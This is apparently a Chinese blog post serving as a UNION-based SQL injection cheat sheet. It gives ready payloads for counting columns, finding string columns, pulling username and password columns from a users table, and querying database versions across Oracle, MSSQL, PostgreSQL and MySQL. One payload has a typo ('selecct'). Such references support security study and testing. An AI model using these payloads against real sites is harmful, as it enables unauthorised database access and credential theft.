SQL注入参考

一、union注入(联合查询)

1、如何测试注入

首先找到注入点:

1)后面拼接'+union+select+null--

2)后面拼接'+union+select+null,null--

3)后面拼接'+union+select+null,null,null--

以此类推,确定column的数量,假如数量对上一般返回码200,反之500

4)把null替换成类似'abcdd',测试这个column是否返回的是字符串,假如是字符串即替换成列名称比如username、password的列。例如:'+union+select+'abcdd',null,null--

5)后面拼接'+union+select+username,null,null+from+users--

6)需要把两个数据合并成一个列,就需要了解一下:

数据库连接符
数据库类型拼接方式
Oracle'foo' || 'bar'
Microsoft'foo' + 'bar'
PostgreSQL'foo' || 'bar'
MySQLconcat('foo','bar')

例如'+union+select+username||'~'||password,null,null+from+users--

2、如何获取数据库版本

1)oracle查询必须指定一个表名,有一个表dual可以实现这个需求:

'+union+select+null,null+from+dual--

2)和1测试注入点的方式类似,确定字符串的返回位置,进行测试须知:

数据库类型版本语句
Oracle

SELECT banner FROM v$version

SELECT version FROM v$instance

MicrosoftSELECT @@version
PostgreSQLSELECT version()
MySQLSELECT @@version

例如:'+union+selecct+banner,null,null+from+v$version--

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值